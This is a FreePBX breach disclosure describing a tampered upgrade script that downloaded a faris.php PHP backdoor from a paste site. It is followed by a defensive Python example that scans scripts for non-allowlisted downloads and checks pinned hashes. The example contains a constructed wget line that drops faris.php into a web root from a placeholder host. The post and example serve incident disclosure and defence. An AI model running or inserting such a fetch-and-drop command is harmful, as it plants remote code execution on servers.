Earlier this week we detected a breach of one of our servers resulting from a vulnerability in the OpenX Open Source project that was reported earlier this month. We use OpenX within the FreePBX.org server infrastructure. The hacker got to our system before we updated the server.
We closed the security hole upon detecting it and have spent many dozens of engineering hours scanning through our systems to isolate areas that might have been compromised.
Shortly into this process, one of our community members reported an anomaly in a Distro upgrade script that was quickly tracked down to a compromised upgrade script on our server. We were able to contain this issue quickly such that only 8 other customers downloaded the script.
Before elaborating on the breach, I want to take the opportunity to talk about something positive in the midst of this ugly issue. Our upgrade scripts are open, human-readable scripts. As such, thousands of eyes can review our work, and it was this process that helped us quickly discover and contain the vulnerability. For that we are very grateful!
The vulnerability in the upgrade script does the following. Upon running the upgrade, it goes out to a pastebin site and installs a very small script to the following location on the compromised system:
That script is designed to receive two parameters: a password and an arbitrary string that can be decoded and executed in PHP on the compromised server. Since the upgrade script goes out to an anonymous pastebin site to download and install faris.php, the hacker does not know about the compromised system. Therefore, the hacker is not able to directly track the system. This means the hacker must randomly scan the entire internet seeking out systems open to the internet that respond to an http request to the faris.php script. As is the case with many vulnerabilities, the hacker probably had scripts running around the internet looking for this faris.php script so it can download and execute an unknown attack. Our efforts tracking down this vulnerability made it clear that this hacker has compromised other projects, and there are certainly scripts out there looking for faris.php. Since the hacker protected their vulnerability with a password that is hashed, it makes it extremely difficult for ‘[i]copy-cat[/i]’ hackers to write and scan the internet for such compromised systems to do their own damage.
We are looking at mechanisms to put in place to help further protect against a vulnerability such as this. The FreePBX module admin already has a cross-check of md5 hashes when downloading module upgrades. That mechanism is an improvement, though by far not immune to being fooled. We are examining the Distro upgrade script process as well as the current Module Admin system to plan future improvements to further cross-check against such attacks or general download corruption.
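As an added illustration (this is not code from the FreePBX project or from this post), the following Python shows two defender-side checks that follow from the two paragraphs above: auditing an upgrade script for downloads from hosts outside an allowlist or for references to the faris.php indicator, and verifying a downloaded script against a hash pinned out-of-band, shown next to a same-origin md5 check that a compromised server can simply update along with the file. The host names, file paths and script contents are constructed placeholders, not the project's real values.

```python
import hashlib
import re
from urllib.parse import urlparse

# Assumption: the project publishes upgrade files only from hosts it controls.
ALLOWED_DOWNLOAD_HOSTS = {"mirror.example.org"}
# Indicator named in the post: the dropped backdoor file name.
KNOWN_BAD_FILENAMES = {"faris.php"}

# Constructed sample of a clean upgrade script (not the real one).
CLEAN_UPGRADE_SCRIPT = """#!/bin/bash
# distro upgrade script (constructed sample, not the project's real script)
wget -q -O /tmp/freepbx-distro.tgz http://mirror.example.org/freepbx-distro.tgz
tar -xzf /tmp/freepbx-distro.tgz -C /opt
"""

# Same script with the kind of line the post describes appended: a fetch from a
# paste site into the web root. Path and URL are placeholders.
TAMPERED_UPGRADE_SCRIPT = CLEAN_UPGRADE_SCRIPT + (
    "wget -q -O /PLACEHOLDER/webroot/faris.php http://pastebin.example/raw/PLACEHOLDER\n"
)

URL_RE = re.compile(r"https?://[^\s'\"]+")


def audit_upgrade_script(text):
    """Return (line_no, reason, line) findings for downloads from non-allowlisted
    hosts and for any reference to a known indicator file name."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname or ""
            if host not in ALLOWED_DOWNLOAD_HOSTS:
                findings.append((n, f"download from non-allowlisted host {host}", line.strip()))
        for bad in KNOWN_BAD_FILENAMES:
            if bad in line:
                findings.append((n, f"references known indicator {bad}", line.strip()))
    return findings


# Simulates a hash recorded through a separate trusted channel at release time
# (e.g. in a signed release note), not fetched from the download server itself.
PINNED_SHA256 = hashlib.sha256(CLEAN_UPGRADE_SCRIPT.encode()).hexdigest()


def check_with_pinned_hash(script_text):
    """Accept the script only if it matches the out-of-band pinned SHA-256."""
    return hashlib.sha256(script_text.encode()).hexdigest() == PINNED_SHA256


def check_with_same_origin_md5(script_text, md5_served_with_it):
    """The weaker pattern: compare against an md5 served next to the file. If the
    server is compromised, the attacker republishes a matching md5 too."""
    return hashlib.md5(script_text.encode()).hexdigest() == md5_served_with_it


if __name__ == "__main__":
    for finding in audit_upgrade_script(TAMPERED_UPGRADE_SCRIPT):
        print(finding)
    print("pinned sha256, clean   :", check_with_pinned_hash(CLEAN_UPGRADE_SCRIPT))
    print("pinned sha256, tampered:", check_with_pinned_hash(TAMPERED_UPGRADE_SCRIPT))
    attacker_md5 = hashlib.md5(TAMPERED_UPGRADE_SCRIPT.encode()).hexdigest()
    print("same-origin md5, tampered:", check_with_same_origin_md5(TAMPERED_UPGRADE_SCRIPT, attacker_md5))
```

The audit flags the injected line twice (unknown host and the indicator name) while leaving the allowlisted mirror fetch alone. The hash comparison makes the post's caveat concrete: a digest that travels with the file from the same server passes for the tampered script once the attacker updates it, whereas a digest pinned through an independent channel (or a signature over the file) does not.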
Although we are still scanning various systems, we feel this is probably the extent of the damage done by this compromise. If we find other issues that need communicating, we will do so.
[b]The FreePBX Team[/b]